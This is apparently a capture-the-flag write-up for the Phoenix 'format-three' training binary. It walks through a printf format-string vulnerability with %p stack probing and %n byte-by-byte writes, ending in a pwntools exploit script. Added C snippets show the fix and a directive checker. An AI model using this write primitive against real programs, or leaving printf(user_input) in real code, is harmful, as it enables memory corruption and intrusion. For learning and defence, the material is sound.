phoenix - format 3


Let's list the files using the ls -la command,

user@phoenix-amd64:~$ ls -la
total 28
drwxr-xr-x 2 user user 4096 Jun 13 15:44 .
drwxr-xr-x 3 root root 4096 Jan 13  2019 ..
-rw-r--r-- 1 user user  220 Jan 13  2019 .bash_logout
-rw-r--r-- 1 user user 3526 Jan 13  2019 .bashrc
-rw-r--r-- 1 user user  675 Jan 13  2019 .profile
-rwxr-xr-x 1 user user 6120 Jun 13 15:44 format-three

Let's check the file type of the binary using the file command,

user@phoenix-amd64:~$ file format-three
format-three: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1, not stripped

It is a non-stripped binary, so symbol names are available.

Let's try running it,

user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
monish
monish
Better luck next time - got 0x00000000, wanted 0x64457845!

It seems we have to overwrite some variable with a specific value.

Let's analyse it in the debugger.

There is a variable named changeme,

(gdb) info variables
All defined variables:

Non-debugging symbols:
0x00000000004007e8  __GNU_EH_FRAME_HDR
0x0000000000400850  __EH_FRAME_BEGIN__
0x0000000000400890  __FRAME_END__
0x0000000000600898  __CTOR_LIST__
0x00000000006008a0  __CTOR_END__
0x00000000006008a8  __DTOR_LIST__
0x00000000006008b0  __DTOR_END__
0x00000000006008b8  _DYNAMIC
0x00000000006009f8  _GLOBAL_OFFSET_TABLE_
0x0000000000600a38  __dso_handle
0x0000000000600a40  __TMC_END__
0x0000000000600a40  __bss_start
0x0000000000600a40  _edata
0x0000000000600a40  completed
0x0000000000600a48  dtor_idx
0x0000000000600a60  object
0x0000000000600a90  changeme
0x0000000000600a98  _end

The changeme variable is at 0x0000000000600a90.

This 64-bit address contains null bytes (\x00), which are bad characters for our input, so we cannot pass it.

So let's try the 32-bit build instead,

user@phoenix-amd64:~$ nm format-three | grep changeme
08049844 B changeme

So changeme is at 0x08049844

Let's view the source code for a proper understanding,

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int changeme;

void bounce(char *str) {
  printf(str);
}

int main(int argc, char **argv) {
  char buf[4096];
  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);

  if (changeme == 0x64457845) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    printf(
        "Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
  }

  exit(0);
}

The buffer here has a size of 4096 bytes, and bounce() hands it straight to printf() as the format string, so our input controls the format.
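The root cause is printf(str) in bounce(): whatever we type is parsed for conversion directives. As an added example, not part of the original writeup or of the challenge source, here is the one-line fix (a constant format with the user data as an argument) together with a small check that counts directives in untrusted input, which is what a code review or a runtime guard would flag. The function names bounce_fixed and count_directives are my own.

```c
#include <stdio.h>

/* Fixed version of bounce(): the user-controlled string is passed as an
   argument to a constant format, so printf never interprets it. Returns the
   number of bytes written, like printf does. (Example code, not the
   challenge's own fix.) */
int bounce_fixed(const char *str) {
    return printf("%s", str);
}

/* Count printf conversion directives in untrusted input. "%%" is an escaped
   literal percent and is not counted. A non-zero result on data that is about
   to be used as a format string is exactly the condition a reviewer, the
   compiler (-Wformat -Wformat-security) or a runtime check should flag. */
int count_directives(const char *s) {
    int n = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* "%%" prints a single '%' */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void) {
    /* Constructed sample inputs, the second one shaped like the page's probe. */
    const char *benign = "hello, 100%% done\n";
    const char *probe  = "AAAA %p %p %p %p %n\n";

    printf("benign: %d directives\n", count_directives(benign));
    printf("probe:  %d directives\n", count_directives(probe));

    /* The probe is printed literally; %n never reaches the parser. */
    bounce_fixed(probe);
    return 0;
}
```

Compiling the original with gcc -Wformat -Wformat-security already warns that bounce() calls printf with a non-literal format and no arguments; the fixed form compiles clean.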

The main condition to pass the program is,

if (changeme == 0x64457845) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    printf(
        "Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
  }

So we have to overwrite the value of changeme with 0x64457845, which is just ASCII:

>>> print("\x45\x78\x45\x64")
ExEd

It is very similar to the previous challenge.

Now let's pass format specifiers as our input to find the offset of our buffer on the stack,

user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x20702520 0x25207025 0x70252070
Better luck next time - got 0x00000000, wanted 0x64457845!

So the AAAA we passed to find the offset shows up at the 12th position.

Now, let's try writing to it using %n,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*14)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x8049844 0x20702520 0x25207025
Better luck next time - got 0x00000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!

Now let's split the changeme variable into 4 parts, one per byte:

From 0x08049844 for the last byte (LSB), the 1st part,

to 0x08049844+0x3 for the first byte (MSB), the 4th part.

(1 byte = 8 bits, 1 hex char = 4 bits)

So we are able to write 0x00000054 into changeme with our input and %n.

Let's try increasing it by adding more data to our stdin input,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x44\x98\x04\x08 '+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141
Better luck next time - got 0x00000063, wanted 0x64457845!

Furthermore,

user@phoenix-amd64:~$ python -c "print('AAAABBBB'+'\x44\x98\x04\x08 '+'%p '*13+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAABBBB 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x42424242
Better luck next time - got 0x00000072, wanted 0x64457845!

So if we pass the address of the right byte and write with %n, we can set it to a value of our choosing.

Let's try it from the start,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
  0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000059, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000058, wanted 0x64457845!

So we can clearly see that each address adds 5 to the count when it is followed by a space and 4 without the space.

Let's pass them without whitespace for easier calculation,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000053, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000057, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x0000004c, wanted 0x64457845!

On the second part,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00006200, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00005600, wanted 0x64457845!

On the third part,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00620000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00560000, wanted 0x64457845!

On the last part,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x62000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x56000000, wanted 0x64457845!

Now we know which address controls which part.

But we still need to know what data makes %n write the desired number into that address.

And note that even the format specifiers themselves change the number of bytes written, since each one prints a different amount of text:

user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x53000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%x '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 f7f81cf7 f7ffb000 ffffd748 8048556 ffffc740 ffffc740 fff 0
Better luck next time - got 0x45000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%d '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 -134734601 -134238208 -10424 134514006 -14528 -14528 4095 0
Better luck next time - got 0x46000000, wanted 0x64457845!

So it's going to be trial and error from here on.

On the first byte,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'AAAAAAAAAAA'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'A'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!

But here comes the tricky part: we cannot scatter our addresses at different places in the input.

We need to place them in order,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*20)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x80498440x80498450x80498460x80498470x702570250x702570250x702570250x702570250x70257025
Better luck next time - got 0x00000000, wanted 0x64457845!

We have placed them in order, now let's try our trial and error,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%x'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0
Better luck next time - got 0x00000046, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%d'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000-134734601-134238208-10424134514006-14528-1452840950
Better luck next time - got 0x00000047, wanted 0x64457845!

There is no way to write 0x45 when the count already stands at 0x54, so let's aim for 0x145 instead (only the low byte matters for this part),

>>> int(0x145-0x54)
241

So we need 241 bytes of junk,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00000145, wanted 0x64457845!

Now the first byte is written correctly.

Let's do it for the second part,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00014545, wanted 0x64457845!

We need to increase it,

>>> int(0x78-0x45)
51

So 51 bytes of junk are needed,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00017845, wanted 0x64457845!

Now let's go for the third part,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x01787845, wanted 0x64457845!
>>> int(0x145-0x78)
205

We need 205 bytes of junk,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x02457845, wanted 0x64457845!

On our last part,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x45457845, wanted 0x64457845!
>>> int(0x64-0x45)
31

We need 31 more bytes of junk,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'A'*31+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!

That's it! We have completed the challenge.

Let's create an exploit script for this,
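The four padding values above came from trial and error, but they follow one rule: each %n stores the running byte count as a 4-byte little-endian integer, and because the four stores overlap (changeme+0, +1, +2, +3), each later store overwrites the high bytes of the earlier one, so only the low byte of each count survives. The padding for a byte is therefore (wanted byte - current count) mod 256, which is why 0x45 had to become 0x145. As an added example that is not part of the original writeup, the following C program replays those four stores on a simulated 8-byte region and reproduces both the paddings (241, 51, 205, 31) and the intermediate "got 0x..." values the page observed. The starting count 0x54 and the target 0x64457845 are taken from the writeup; the function names are my own.

```c
#include <stdint.h>
#include <stdio.h>

/* Simulated memory around `changeme`: 4 bytes for the variable plus 4 bytes
   of slack, because a 4-byte %n store at changeme+3 spills past it. */
#define SIM_SIZE 8

/* Byte count at which the first %n fired on the page's run, and the value the
   challenge wants. Both values are taken from the writeup. */
#define START_COUNT 0x54u
#define TARGET      0x64457845u

/* Padding so that the low byte of the running count becomes `want`. This is
   the writeup's subtraction (0x145-0x54, 0x78-0x45, ...) done modulo 256:
   when the wanted byte is below the current count we wrap around, which is
   why the page aims for 0x145 rather than 0x45. */
unsigned pad_for(unsigned count, uint8_t want) {
    return (want - (count & 0xffu)) & 0xffu;
}

/* Store the 32-bit count little-endian at mem[off], as %n does on x86. */
static void store_le32(uint8_t *mem, unsigned off, uint32_t count) {
    for (unsigned i = 0; i < 4; i++)
        mem[off + i] = (uint8_t)(count >> (8 * i));
}

static uint32_t load_le32(const uint8_t *mem) {
    return (uint32_t)mem[0] | ((uint32_t)mem[1] << 8) |
           ((uint32_t)mem[2] << 16) | ((uint32_t)mem[3] << 24);
}

/* Replay the four %n stores to changeme+0 .. changeme+3 starting from byte
   count `start`. pads[i] receives the padding inserted before store i and
   after[i] the value of changeme visible after it (what the "got 0x..." line
   shows when the run stops there). Returns the final value of changeme. */
uint32_t simulate_writes(unsigned start, uint32_t target,
                         unsigned pads[4], uint32_t after[4]) {
    uint8_t mem[SIM_SIZE] = {0};
    unsigned count = start;
    for (unsigned i = 0; i < 4; i++) {
        uint8_t want = (uint8_t)(target >> (8 * i)); /* byte i, LSB first */
        pads[i] = pad_for(count, want);
        count += pads[i];
        store_le32(mem, i, count); /* overwrites the high bytes of store i-1 */
        after[i] = load_le32(mem);
    }
    return load_le32(mem);
}

/* Accessors for the writeup's own run (step 0..3). */
unsigned page_pad(int step) {
    unsigned pads[4];
    uint32_t after[4];
    simulate_writes(START_COUNT, TARGET, pads, after);
    return pads[step];
}

uint32_t page_value_after(int step) {
    unsigned pads[4];
    uint32_t after[4];
    simulate_writes(START_COUNT, TARGET, pads, after);
    return after[step];
}

int main(void) {
    unsigned pads[4];
    uint32_t after[4];
    uint32_t final = simulate_writes(START_COUNT, TARGET, pads, after);
    for (int i = 0; i < 4; i++)
        printf("store %d: pad %3u bytes -> changeme = 0x%08x\n",
               i + 1, pads[i], after[i]);
    printf("final: 0x%08x (%s)\n", final,
           final == TARGET ? "matches target" : "mismatch");
    return 0;
}
```

The intermediate values it prints (0x00000145, 0x00017845, 0x02457845, 0x64457845) are the same ones the four runs above reported, which confirms the model: the high bytes of each count end up in the slack after the variable or get overwritten by the next store, and only the low bytes line up into 0x64457845.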

user@phoenix-amd64:~$ cat exploit.py
# Python 2 / pwntools: p32() returns a str here, so it concatenates with the format text.
from pwn import *
junk='A'
changeme=0x08049844
buf=""
# the four target byte addresses first, in order, so each %n picks the next one
buf+=p32(changeme)
buf+=p32(changeme+1)
buf+=p32(changeme+2)
buf+=p32(changeme+3)
# 11 %p to walk the stack up to our addresses (count is 0x54 at this point)
buf+='%p'*11
# padding before each %n so the low byte of the count is 0x45, 0x78, 0x45, 0x64
buf+=junk*241
buf+='%n'
buf+=junk*51
buf+='%n'
buf+=junk*205
buf+='%n'
buf+=junk*31
buf+='%n'
print(buf)

Let's try running it,

user@phoenix-amd64:~$ python exploit.py | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!

Done! We have completed the "format-three" challenge.